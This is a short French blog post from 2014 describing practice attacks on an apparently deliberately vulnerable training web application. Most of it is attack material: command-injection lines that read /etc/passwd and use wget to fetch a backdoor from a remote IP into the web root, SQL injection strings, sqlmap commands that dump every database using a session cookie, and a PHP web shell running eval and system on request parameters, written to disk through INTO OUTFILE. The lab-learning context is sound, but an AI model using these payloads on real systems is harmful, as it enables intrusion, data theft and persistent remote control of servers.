Je me suis fait un petit (Low !) entrainement à la sécurité informatique des sites Internet. J'ai modifié la configuration pour me permettre de comprendre les mécanisme d'attaque et d'envoie de backdoor. Nous verrons ici, comment il est possible d'écrire une backdoor via deux failles Web.





Remote Execution:

; cat /etc/passwd
; which wget
; pwd

# Upload backdoor
; wget http://172.168.248.131/bd.txt -O /opt/lampp/htdocs/vulnerabilities/exec/backdoor-from-remote-execution.php






 
SQL Injection:
 
# Test
' OR ''='
 
# Recherche de TABLES par défaut
1' UNION SELECT user,password FROM users WHERE ''='
 
# Utilisation de sqlmap pour dumper les bases de données
sqlmap --cookie='PHPSESSID=30356p6ofgultlfgd4evck5sg4; security=high' -u 'http://172.168.248.130/vulnerabilities/sqli/?id=1&Submit=Submit' --dbs
sqlmap --cookie='PHPSESSID=30356p6ofgultlfgd4evck5sg4; security=high' -u 'http://172.168.248.130/vulnerabilities/sqli/?id=1&Submit=Submit' --dump-all
 
# XSS dans une injexion SQL (pour le fun!)
1' UNION SELECT "<H1>SQLINJ</H1>",password FROM users WHERE ''='
 
# Ecriture d'une backdoor via une injection SQL
# PS : sans saut de ligne
1' UNION SELECT '<?php if( isset($_GET["php"]) ) @eval($_GET["php"]); elseif( isset($_GET["cmd"]) ) @system($_GET["cmd"]);
else header("HTTP/1.1 404 Not Found"); ?>',password 
INTO OUTFILE '/opt/lampp/htdocs/vulnerabilities/sqli/backdoor-from-inj-sql.php' FROM users  WHERE ''='



   =>   Écrit par : Nicolas, le 07 juillet 2014


 
Mots clés :  
  security 
  
  php 
  
  network 
  
  backdoor 
    >   Articles connexes :

/tmp et /var/log en noexec sur macOS

/tmp et /var/log en noexec sur macOS



Durcissement de Windows

Durcissement de Windows



Troll The Lamer

Troll The Lamer



Se protéger des injections SQL

Se protéger des injections SQL



GitVuln

GitVuln


HTTP Server, tell me who you are ?


Discuter avec un serveur web *apparement* muet ? Voici comment faire...


SSHd as a backdoor

SSHd as a backdoor


1955773